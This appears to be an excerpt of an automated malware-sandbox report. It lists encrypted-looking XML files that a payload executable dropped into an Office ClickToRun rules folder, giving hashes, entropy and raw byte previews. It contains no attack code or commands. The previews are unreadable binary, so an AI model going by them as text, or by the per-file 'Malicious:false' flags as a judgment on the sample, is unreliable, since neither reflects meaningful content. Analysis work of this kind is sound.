                                                                                                      SHA1:06F960FE452FCC62DBBA4FA66D58C9DA9FFF307D
                                                                                                      SHA-256:7B9F63A6E63D307385B5D9BB4FD21EAB424DDC897A5E7379721A428E841B7A1F
                                                                                                      SHA-512:237DECBFA5C522DCB577811B14B3744875A868D9B0B599A7156ACDB03427F2178A55C49C56C23C6171AF4D5A4CA4F7ABC2A655A034EE2C03EE0B751687548374
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.F..Ez.n.U..7>...N.<.V......2).O.......o.....l.T...*t*...?(...B...[.:*.%..........Z..I.....d..pZ]P.|.C.<J..HA.u5....j..9..ZH..o..o...1B}...w.........V.qE4....H@~.o.W\...H.<..Px..Q.....M..6.s..e>..K..BI..R.....E.-1:.%..w.*i.Z..V...E.}%v.....7.T.h. ...U.m3.34..g...T.P.\..G_..q;t.y....W..F.X..'..[..|...^...z....q.0.)g6[.W......Jw...5.p._...i..K$....&:g.:..&]..-....l....[ .Q...0u....!....X...+E..p..DCXT?..N.K.[.0.T.b....{.0...v....%n.~V...@ k.R../.f.z.{t....*..F.O.s.rCT......{.....D1.h....\.x../.s8.=...'.}q.(.....(....U...:.y.z..t~..........0...Iy.4.Kv.Z/C.g....1.-X........*....E.._ .NZ.@....J.R..%.h.Iu..|..........m,.~...a..r...sj...h.X..(..1..-y..5.N. ...fc.[0..e.....B....B.............i..H..S@^...'.Z.c..@.r...e4.fJ.-....0l.....|..%....`..(....s.....#E...........!H[.(=....... A..'....S...A.J.J.Y F=.0N.gzq.Z...v<V/...$ .XX{Cx...Y..5.5...\+..88K.........3..)>..X.-.....v..t.R.}..z..i..i|o0...M....*."S.....PJ.m.bqUT.m..'.,OLy{..`.R3A.....q..oY_...E..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703900v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1724
                                                                                                      Entropy (8bit):7.87773406725846
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:vwe641UEassFLBo4xYzCyFemwpgONzBCzAhwD:v64eEaVLBoHuyFLcs
                                                                                                      MD5:385B2BE6C2505285C0A20315F39E4064
                                                                                                      SHA1:47F7579684EF5711C743C6ADA869DED28F51AA6E
                                                                                                      SHA-256:287FADF09638859BE53A47B720AA3E7BBC2C7401B5C5CA89E06279AB80B6B9D0
                                                                                                      SHA-512:46C195051E832EB61DBD66CCEF0007D4A4CD847F858CF32C116082F71C68BC45CD291779E383A228ACF46EEEE078B0958240A1A0A4830C6D9D8CF6F06DCDC38E
                                                                                                      Malicious:false
                                                                                                      Preview:.<?S......H..q.n....U..U..G...p.I.].o.Bi...K|..#.OU..>y...7VT.\...>.M..%.....p.P.DI.....O.m..R...R.+..&:0YM...oa..i.+..0H....E...C"YT..MCn...O..>&t..2....-,,n.....u.9.?.V.j.......W......5..s.....wu.u.....I.D.....+..~c.Tg..N...G..;.gK9...Z......{.Y...=.ps.I+i...lI...j.<.h.r..^..5F.....a:.I.K...i.IL.x.g..Z.,.o.FH.......p....../M...;YG....5.V9...-.X0.....pZ......K._#...}@M.......T.d.~...W.jQ.sI....dvg.......M..L.F^a.t}u.L.i.........r.K(E.,....&...lQ.V".s..&Y.NX.[.a..,E....4..d..?......;......M......L..........8.k..Q,..*K...#e.2..>....!....;.......^...6@=........xR.Cb.c...Y..J[..%.j{T...k"I..I..9.c.Q....O..I...K.b|.Q......Cj.C#...t1.Q\j.;y..|qQ...)...9...t[..nB!...X>........<...'#..6...(...!.8io!..&..S...?fa.....$...]kzs..hY|Q[...}.@'...-N.e..aIu[.x..?.R.3.te...:....2C.,.Cm.....A..4b.........ZA.'CS..ZF.......d.y....@ri......5~......^.."-....c.mO...uhq#...)..t.....O.e0......,........6...uC..7.#..V B....O5.DC..j..1i9.iN3.Q[>]..{.Ht|..._R.J.U

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703901v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1761
                                                                                                      Entropy (8bit):7.885632310550323
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:yQPakDOKkmoVJClZjBxj+SvnIYMhJ1OSLSFG/LwD:DPaLkoyd+S/IYn8MT
                                                                                                      MD5:DE5138C2F6A10215DBCC632C90C4A5FA
                                                                                                      SHA1:5ADDAD77EB988C48A884F094BEA749CC54B3B4FA
                                                                                                      SHA-256:5F3915CEBA719D91024BA717ECB00FA42E397D24D3243D5DA87BB2E12DCD483C
                                                                                                      SHA-512:25AB003B7BB91AE46B267F4655058E023A72C90990AC464DE4E7F981969F095347FF264E74641FDB61E783870B831A0D2DA9F4CF246BE8BA85FFF5DC71DA2318
                                                                                                      Malicious:false
                                                                                                      Preview:.<?....b.v.F..DEN..$(.U?B_...".-..u.'...Li..v.v...HU..B../.|.Es.J...m..;....i...9.B........qz^.r....zy.....}.O.'..q..B.. ......$..Y...K7^..5.).,.Z..cF.9+...n.V...7.O...X....?.....QG.......w....L.9..4.H..&L.*.s.q....y...J4....DWj(YB.UZ.lY5...B...q...!u.izx...} @.mm.I~y....W%d.ow...8..W..$..[..2.\... ....H..g%H. .^....................q....2.l..(@Q.0.*6A..n..t.}q.O..Z.E..c..W.. ...I..?.z.3.@.bIXp<..ga.........H...-..Y..T.....\Yh....OdB: U._]..{..v.#P........UZ-.F.%Q\6....iWs..<.. .pa .b...a..>...).}......./?SA'B.cwf...Eb.$.g.m.*.....[.F.?W................/......_.In6.W..b0c.J......n.D._*.>u.]e..uZ..lK.F.......F.S..Fh....Cxw$J..-..].m7.7k.<....L3....: ./j^ ....Ph.#....^..<.F..-..d"S..u.Z''Tm9.. .`#...=I....u...... %.G..F".N...!.7~.E.L...K.=Qx....].n.c....~Q.\."z...L.x.g.C7.........'..7.B!4X........\..cJ.K.........[!.O...k....:+.....{G.M....K.].qUl>K3.e.r...G.%.3J...$,....%.m...5.~w.W.P..L......t~.'m.r....K....c.J........P.c....U......pd.o.N...(...uf.D

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703950v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1700
                                                                                                      Entropy (8bit):7.896964053614593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:PLy3wIcueoThyidjgN/fkMYDQKe562cD/VU1CeNwD:PLyAIcqsN/PKFVUYz
                                                                                                      MD5:D698591FBD0DE3F983203D9C4CD33DB4
                                                                                                      SHA1:68A2A862A3481916653202C088B862446DDF0A99
                                                                                                      SHA-256:ACBD7FFBE1AF90006C86115E5CCC4FA9C11A290A80C27EE769E2A69A660E1E94
                                                                                                      SHA-512:1F6CF476585B4D6FC9B68AA8ACC153D95388AB306ECBF5811B0CCCF8B7B876EAF9251B80B3D5CC0245C6ED5CCC5DA7B7C190A253CD57A801642C56D15FA79F5F
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..Y.....*VX.r..Hi.m:%QL.G.5.Ve.[.."SU..!{!.T..t.R...t....Q..?...{$...W.?2.s......*")+t..LX/D.......*X......u.7?$..v....?.d.U............^.m...P.....8../.......J.$z...I4.}....*.U,...o..E.,.5iK7....CB.Q..}...l..L..+.X..s...J0.9J....J..IK..$.)WB0s.....kj1Z.+u.$...y......a....%...r......y...F......[.i.K.@.N.C.. ...#.L.{-~TL..\........a!...q.2 .k....ER..q..x^jP.ON._.3..../.....i@.G..=>.{.....j..$..>Nn....,.u....V.M./..z.a.B.X.....c.x5....Y...a..~3..;a...u.....3R.._.]...e.D..m.a.{.).N.y..+...f.%U.....Gi..x.....d|...U...k.;..N5..Qa.]'...i....KA[...I...X.S!...OG9v.4a&..9.....N...l..........x.@..]5...Z.....[....w..`3&..xWY.ss3...L.3..n1.....8a..J5..O....G....nW.P..s.{....E[..Q.#..2~...........;P.&.G&~..7....Sq...b... 8...n.....7..R.:9.}..ZXe....c.N .q.g..4.I...E.rN.Qg.`.k..G...L..c....4E.r...#=}^J.S5...X..0..f..*f~T+.S..X...fWd...Yt4....[l..#]....h[.B.a..)...DBQ......r.p......C...[.#=.._....=.N.....6.o.x..."P(.M*..La..}&A,LG.i|....^.......}G..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703951v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1737
                                                                                                      Entropy (8bit):7.896410454266527
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:DsNmtmYpFbV8X0e2KEUAMaArrmKLBkjMatSzV/KXlDadFZQHGf9w7cnAapB1nQqB:DscEFgnChBqbYR/4adrvw4A4B1F4wD
                                                                                                      MD5:80C35574DF91AD19B625E826D8476387
                                                                                                      SHA1:DC04BE47AFB7A514D7FABAA50B31633A96D48899
                                                                                                      SHA-256:36E8C060745DE75B50B8B4422D441777E5E3E1ABD72AAA958F1A46C4A17022D7
                                                                                                      SHA-512:175328A85CEA25239EBA101A11E0287A0DD28F7BDF394288127B298E9ADA5A36B91DEC71B3E438FAEDE7CC98C14D3EA71DE37ED27015AEE9101016A855C25DCE
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..Fk....l.-._P.-pi.fU..CJ..q.......`k....$hG..{CH...+.h:.7.~.n2B.jx.P.^.<J./..u@..rT......[..tO....b......Lw...n.'....Ts......qA....f....~X...@/.s....<...k...q.o9..d.2..1TJ+.G.RD........Y4...Q3....%t..<BXX?.S.#..S.qt.!.. 40.^Q.R!.l.8y.{1.....TE....-..^..H.te_..a.......d...W.l....<..a/.'.&..^>.A.k:.(.0.......5y.s.|.![/.?...4Y...@G=,.....o....-.xf...V.P.Xy...w.Xh...j......`..p......X..K.....u?u|...q..T...&.waa.s.yh3.....z....P._`....K..;Qn6...x.-.L.,....].y.[.i..[R..4.9...<".beP..3.U..v..c!5\.O.....h.UL.2A.x.x&.\}......W. R...!..^|..H).8k'.O.V........[(6M..$8.D.o.]&6f..].!.;`Y.k.4O...x.L..J..4 .nH..p....=.....O.V..c..S..?.....F....,.......(..E.G...Smh..B*....s.........F.f.K.J.J....0.{.slX+X...b.c.-...~IC...O......(6b.......@....$.......5.m...#..l...&|...u...%S.oV..^...e....4P..r.x.v;3.=..}.B+.q....rn.....eH...o....o...$..&....]`l.1@.`%.n...w...;d\.x...y.m.Vd...XH.C...R.u).A(lbj..../g.hBv.m.:.....m..,..@..s^....8.M.Z...b.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704000v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1716
                                                                                                      Entropy (8bit):7.871361972348798
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:nbvAhHv1Z9ZiAM15mZMTc/4GZV1KheAZCTVpwD:zAhPmm6S4EM
                                                                                                      MD5:8254E815308D12AF1DE5D9BA29A3395B
                                                                                                      SHA1:52C0C325AB32B8A333ED412FA64A01B903E9E0CA
                                                                                                      SHA-256:4A06C5C02D806E5DE75D321375B432FDDE8CCCEEF627FFF1C25F5C7AC7019390
                                                                                                      SHA-512:E968CA6E92FE74F9A5754BCF207ED4D813F3C32FFA889AADC1EFE7FB5BA9994BF6CC0168EE575C1EBC1119AA4BDEE26B26FCEB6802A537039FDADFFD452E745E
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..n..-..S.2..w.Cu..~..$...aTy<e....z.E..c}F`...1zv7Z..-*.)..U...N..q.}..(....-..g=.nHW^...i.'..R....;p..$.cB.A@8.\..m.h.#}..`r.T...%.^Q...Q...nx=:Pj8..7.?.P...C...UO..Gc.hI..T...O.X...S.!.i....).l...`Q....q....../..5M....-.\.......f........t...wE.e..R...GEK...'..5.S. b..........z."...\..RQ0`...c..p.l...kqT..YRh.OY...4..8.;\.......8m..d.....N...O...i...P....5..C.$-....>....;........k.`.C.V.*.jd.>..7..z.....H.d5).;.s.....O}....W...e#r.6.fh...y!.y(..........l.o^`..H..7P..x.1.dn..pR.^e.....]....L.f......k....b..A.4...5...{`..A_}..M.49.Z. C....k.U.....|A\..=...2.>....X.......VJ...Q..U.G..5..-..5.%...M..x.....WT;5<.H0.W.D/.#..{.3....1.>..._.6...sR..X..SXzX.J9v.=[?.a@9R.S..Jq....6....3...<"95.@.2....bqg.ir..C...>-b.Z..Q.......W.-w.=/....G...Y^.[....{.....l.K@....-i........&oe.t$..G..C.3.....C..S0{-ce.....}|@.g..p)......a.....SA.T..i.......Y.D....Y9...0.....T...}...L.f..Hz.....EU....")..2;..^._...^4.:.$..A....LT.;......-.S...ot.Z..ZP.w..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704001v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1753
                                                                                                      Entropy (8bit):7.879825562587335
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:7i7yHwWrMpQHgzetM631RIBbtKofmsq16IPM7boXD0vHmC8NYEtEtquNhLcCDLFV:GG5rMogLzbsg5ItXlYEtElbpP0wD
                                                                                                      MD5:1CA489B95634705C6DFC91B3D33DD26A
                                                                                                      SHA1:D0E1F595EF9508351497D776936F78BF86E87B3C
                                                                                                      SHA-256:F277BAE39FA69FB6C459FC523C387810B52509AC00CA9133600C1D69B6DA2CB0
                                                                                                      SHA-512:0335751EF9105473876BAFEA7F72DF0FD1183D9856B2CEA1097887AB2E81D169CCA05F9FE16E41480188D20FF2F582D38BFFA0EEEC1C3F83BDD79CBC3F7DCD53
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..$.B....."....x....vx...%yJ....?((.6..\/...w.gc`..{c}..X....']...L..V).."...5..^..`%3....g`0..rI6R):.....-HXQ.-.. c...\.....#8.;t.PP5..rZ...1....a.z...........`R...5.h...j...1{.4G..Y.....0AQWf%1.c.Sq......e.....5...qW.e).r.i..Y....Tz..k.S..N.p .s..s..O..O.....9.z.....h.M...W.&...GZ:./.9.z.f)..."9Zt.Q.#..)/s.oj..V[.R...T..?.].QA.j..3...B...S.!.p.....E.J..t.......r...9.E`fwJ...7.......G1.|9:\.eP.u..Uf.%sy.....`.f....Tf...D.7I.|.Y..b#..o..ij..~......g...5..4M...l.N....O...*.C..........M#......].]..Q...vLt&..djK.q..vH..<..1....O..H.......-.L..~....>x......9..i<.'......C".%..u....H....F'H&..+.B......g......r..R.<.n..Bc.......q...&......K..^.N..t.Y.....S...xw.9...qM.....E.w..^.K.#..h..x...7.....Lf..[....l.."..l.b..x...h+Y....V .....~.ZZ.E.AD..(iC....+.<,wo...V.W.g...8G...[a6BI5.eY.b...^.g.g~......({.......).9..8..dE.b..=.Q....rFt....Z.....Oy...J.....b.u.%jV...H.Q....50...5..0..u..=..+.)_/.Z+6.....D..jO.c...!.p..Ycu......2.@6)......n|s.T.c.j

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704050v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1690
                                                                                                      Entropy (8bit):7.873233578298529
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:aaLC0A5ZF771f7woqid0TmdOSutxekLD3TFfX5ng0dqwD:aX7lJb5klZg0J
                                                                                                      MD5:D8C001CBEC3BE6C282CE6879A7F7D162
                                                                                                      SHA1:DB2EEDB622E28B10B6732BD9A80FD89817380B4D
                                                                                                      SHA-256:4AD2B536A616A8EA717D98B9BE84583928E7F7A04DAF08EFEC57C8E94A5F2BE7
                                                                                                      SHA-512:CD787E75F646A26AF2C15FB4C4B1B7BF452FF8BA5E7ED5101797355421B9F0379EDAC4D9D1D39DD40D0365388BC405F084CC16156C6530A3FE24E218121200F7
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..A..B.p..B.5..1+s=9.............:S4.{.-..x..z]3.*.J....d..d....6AM;.s...l8!......G..W8S..y...X.....O..A.T......r...l.f.B....5.....9.DR..a....Ce`b.S.(I.>eG.S[Q.../Mq..$.....).9..J..5.))8...:.OE....f..9._9..t.........S...O_.p.....pN=..Ul2...l5f..o}.........+t.+.L..M7....%.C|....'.\D.^~hM."le....`..z?,Ue}./..P\....0....a......0.f..L...`z7...8.Y.69.rS.hK...i.D..H.^..y....T..@!=M.gR;J.l.{[0....8$....b..6.(.HSi.5....+.m....(z.....M....~*h.H.ax....].)Y.../BN.o..+..sp.i<c....4...'%.gw9.S.MQ...Q|'.b....5u.~..m5..?"hg.....v.`.2O9...}K....".~..P$'.&.WT.].O..cS......'..7.7.it....i.-..|#$(.H....z.."j;...I0~R.C.4 .........?..Z......o......i...Lz.....5....2wO^..........M.)i]....rrDQ"F.K..:.c..6.l.Lr..9B9g..y.@...9.....r..$.7".....x..f.w..Y......n.x..........H.:..0b..'ni.p.D&.......z.<f68.?.^...iK............%..5......+.M....w.:\?...0...y.1Ns_...`.q..>.U.L..4r.....BW. .....M.7..)p..0vQ...V$.=...-..<F"....0...o.H..Ha.Z...q.>9.9}.....N..\.....!CR

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704051v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1727
                                                                                                      Entropy (8bit):7.87542508811615
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:r9gzTrjcSKh91WpGxWBJKt9EPRE1E00eWp1ejKV4d3wGZVXL08+7v6bD:rfJ4JS8K1xqpeKCd3/f2wD
                                                                                                      MD5:C57968721D08C4A76A5B56345CCBFB03
                                                                                                      SHA1:0FB7D7BE22B8F81F600115FD17203F9412B6C016
                                                                                                      SHA-256:6E3FCC8490962667FC11ABE23A9817078909832A3224C5B003DED43360459ACD
                                                                                                      SHA-512:C331EF748D864CD51EF2266043A0C893D272E3B385A1ABDC1DBDFFF5E5BF2D781B9718696BE117549D3D0B635B50CE0CB7CDD83B8E95741E99CEF70EE16A8106
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.f...S.8..Q....,.hr.).......S!K..|h.\.0.t...y..T..P...EF.d...h...n{:.@....n.k....^..-..N..y@S.,s..4.'............X4.YFG8.P..aOV.\s%>@.'......{;}..z.......<O.K@......A`.+..}}"..T...]....$...j1.3.o7zD..B....d._..".<.o.$iY.Y..T.Q.d.T.fz.:..._X&.....$.+...gz1... .?9.C.y..H\..........e..+8.`~.....'......=E...V.P..'....$..=.z...q,....m&..N%k1....8f.5.5^U.3../..._..(/.5=......Ms.?......z...~6$u...Zs.L.._.In...b...t.....VaJ.a....<.j......g......0..PTp.bicV(0d..&...G=$.9pZ...8/.Z......Y.:%......AX.H.9v.0.+.(&\...c.P%...l]..... ..f.==.{Y.w#..g7.#..0.&...c2.B-..t..D-M..hu.Qxm..(.KZW=~.Bn.0...Q..Dw......1Bt...c.Jx........W..O.6....,G.B=...;. 0b.........a.>.M.....]...$.D...rtK..|.....n.8...X.7...;}.......P..9kc,...n.t5.....k.W....|./G{,"......P.\..S3j..<-Q>....l.A.}z..\.L7.a.B....o.G.....y...{...r.......v.7_U.....}g< My!.:s..]....9.n.D..1.+.vm....rH;.....|j...r..].....P>.I...............|.,.5.q....A%<+;.8....J'.|.=.h.I....z.5C..w..._.o5L.D...A...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704100v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1696
                                                                                                      Entropy (8bit):7.875862514964407
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:c4r1c3CVMQ+E4djRZprj88bnp6gW8Aj9q0e8xNe2ZwD:cS+Q+jRBIlhNzxhK
                                                                                                      MD5:B7CD02A1BFF55C4417DEBD95553C30E1
                                                                                                      SHA1:DCDCBB697B8D97EF474C34292FF1EF01563FAAE4
                                                                                                      SHA-256:58D99C40D263EF166F0AFA1D18CCBB8F3FF58DF4ED73DBB299887083B5091D2E
                                                                                                      SHA-512:0E14B3B4A73A83F0001B9CE37DC79B082E3C7625F77E37CE56DB7C4A535FB8DE1EA9299D835A1B37B70CDA96724291D1521B982623F28DBFA99452435110AA3A
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.o>2......=..d........=uP-..oy.t..k.s}."H...(.+R..5.....Y..7cuN.X:....n...%.[.....[.B..B.9..........9.....(3......(\m...D......d...T!..)..U.!e.........".U.lR%...8..#....i_..v..UbV.P.).Cv...nRlEf..szu.pI....$7'R..bVI...j..".X..}..Ew..|.W.........a.zv.VcR....~\/.....o.]&'..$..?8.o..[...mr....sum.qj).fte...8y..o..;pT.&Y.c;..+.....o.x|L.Y.".g?e.j.Wq#.$.....L[_......2....$......^@C)........1pc .....n.. 1.|...bn.>...r*...=(.....9p.....dRE~..q.....X.....~.c/.1X.G...<.0..9..%o.Y.o?..M.....@./....'\.s.Jk...L.6.<.......D....M=.v.p...i.4MX.4_.S..q....L.;7.....M/.G.cP.W.=33.+7...:......n...u.MVF.........)8...'.9...Q6.O.....u.p/.k..9......SS.i.1.Ub..C:T...l.*.....p...1......F...2....V..s.....W...|.........+).S..|...)...-..b.j"......_.LcE..n.].>.Z.g....!*L.<..+......~:!.5.X.. qi......X....p..z..Y..P.vG.%.J..IE.^....rj\.Q.c2.v>.A5,...7..z/6.k.u..`u.....?q.B.....GtP......(:.D..C`..0..j.S.r.|O{...[.K.9_..>...8..Y...n..s..co.$.z..X].Z...g..Q.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704101v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1733
                                                                                                      Entropy (8bit):7.881900451307813
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:qautdGst85RLk7nxkf17qtDnYd6+oWXMB2x96XwD:qaQ856yf1EDaVTXMB2xf
                                                                                                      MD5:63DE5E7891B93287A5ABB22F44F8E274
                                                                                                      SHA1:B9E48EFA0A25AD0F941CA602CE9BC35E3CAC2C5B
                                                                                                      SHA-256:DFE029E6D287731D7ADFBDEE150A19FB847A077153B7645D445BC02B6E1B4CAD
                                                                                                      SHA-512:EFAED78441DFE7AE9062336A3AF69C480861303B9B8BF5C129AC3C385562E09226EAD636D637B779590243C458C6E73A9A2D82711A2D193486CBEF0740AF7166
                                                                                                      Malicious:false
                                                                                                      Preview:.<?...&.1..A......OR:..7....n..Bq....w=g.K........p...W..Ty..i~.Y...'..H.}[...WYw...........G:.....N..o....P...L..`.Jp.h.y....,.......(............k.M.z..^#..X..!O%.77.=..Q+.T..XV.........Y. ....D}.#Z...Aq".c*..Nb....v.Q...............[.5,...;{......[.R!.&.*.-..s0...Wv.g..e.........N`c......HG.@.%=KQf[.<....y.Rf..O9>y...o....`.l4.....=...Tn^..<...FR... ..M+).}.' 1.Nk.kH.{.G+..p.... cx,.3k....:.....u...cb.@..J.1.ge.P.1.".D......n......9..g......6...}...o...z..._.L....N.W...4...........H..4.PQ....gG...........?.<.z..;&.K..uujH.V.^....{[.....#..i..9E...o...sX.d....\tT.....X^.....M.-.&.9..N.U-.^.P+k...vMy3.A"..C.Bj...=H.Q.H...7.aa..l....V.K|^.`z...v...r......Q.s...6...N..7...2.m...P^..Jo?...'....;..h`.Z.......>.y...:/(..C....p..N..m;q.= nF...s.mj,J............kUW.fE.Y"D...cD....0i...E..n^....P.....c.....mk..w..;.9Ui...d#5-L......d....|.l.@.,p5..*/>?...v..z.=....m......Ot....t.>W.-...V'..v...x..K.0..Z....t2i...<x..1........X.,.SB.w...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704150v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1696
                                                                                                      Entropy (8bit):7.8908024811238855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:baFvbqHrg9MwFZxr2nDeoYee/4PoRfmsH2njCaNwsaNSD6/YqA3cv6bD:OBq09Mwvxr2n7beRFEj51D8FAswD
                                                                                                      MD5:CF582C85C24911D0E964885CB5BA7195
                                                                                                      SHA1:CD3834FB4FFD702BE420E825B0C5B7C83FC8B525
                                                                                                      SHA-256:2346687B3768960DE9FAD0FF0DB4370309782E02E6F50B4E3644A956398E77E5
                                                                                                      SHA-512:16C14D3E9DA080D7982BBC800CF81681595C8DF98C06151E6081C3F97B8EBAEAA405344F2E172141B7649C9429DF48789FDEF4EC592BD91C48DE57D8C344A66D
                                                                                                      Malicious:false
                                                                                                      Preview:.<?!L.....:...UhxPL8..C.y.....i...".;.......J.]...\y.....Q..?*..o.o....L...@.w[.d.=....xm+...1N.).n...^^.Czt{...C-...Z......_;..d_..t.E.......I.....C...\.Q.qS<).z.v....Q.1.j....e..W..2..q.E*F...(..P18.L.q'.V.q.jf.2...(Eo..H..DQ..j.WC{.-.E%..3.)"....;d/......g..%....(.]/d.(x<..+..Y$.. `..,.....T..f.>;.....,6.f0...e......J.....tT..w.$...W..-.n./...7Q.......K/63...z..u-.2.7..!p..s,...x{r6....?.+.......]N`X..p+..T...?r....>1...+...o.s.R5...p._..3- ^..'0j>R.B..$Du...Y.."NJ..K...;.M..U..)..^`......|...;hS..CB#..w.;...........b............!'.(.......:i.......p!...;X4..B...pjJ.....er...y.<s.Wn( #.....HP3fSg+...a..v6=.zU.. ..._.P[._.....8SP+.H& .T...}...c.`...*..6...).f.a>F....#b.<..>.F..t..I}....'..Rp..8..p.......bp....v.x..-.....Gn.Z...O.]...0.7I%.g."TP.:.....Z.2w..*e.B/oh....b..."P.$.|...-..W.......\.G.>26......k..~x...Y....].g...N.&....q.^Q....i9Yv.......tE.!..L{.....88V^.a........b.#U..e8...}.6[umf?R....c\F.)...dB..9..cF.8......I..|9..b....R..r

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704151v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1733
                                                                                                      Entropy (8bit):7.8857336475393245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mC6Xq7849T5a+hm5yA0qDa5nXPKJhOYFAYqX826tTiyXkFQJidGEJi4rWqGu+eGN:m5X1DgmEA1uydRqTEZ+Hi4rW5eGszVwD
                                                                                                      MD5:89A0F5D2239D93B2B0A99D193E33632A
                                                                                                      SHA1:57CD2D092198F132F9590D666FC894FCA73046AF
                                                                                                      SHA-256:7B13A8BA69B06CC7775284ED8251B524E71D8C7FB99305BA586CA9D2CFABD2C9
                                                                                                      SHA-512:4AD5F0489205CEADA2CC3977C3612A548B56B76710E6C47FE48FA316DED3124B98ECA33F510D673FB10F57324A64C3D9B0C05DFFF8C49D8AA8476F68A03C0FB4
                                                                                                      Malicious:false
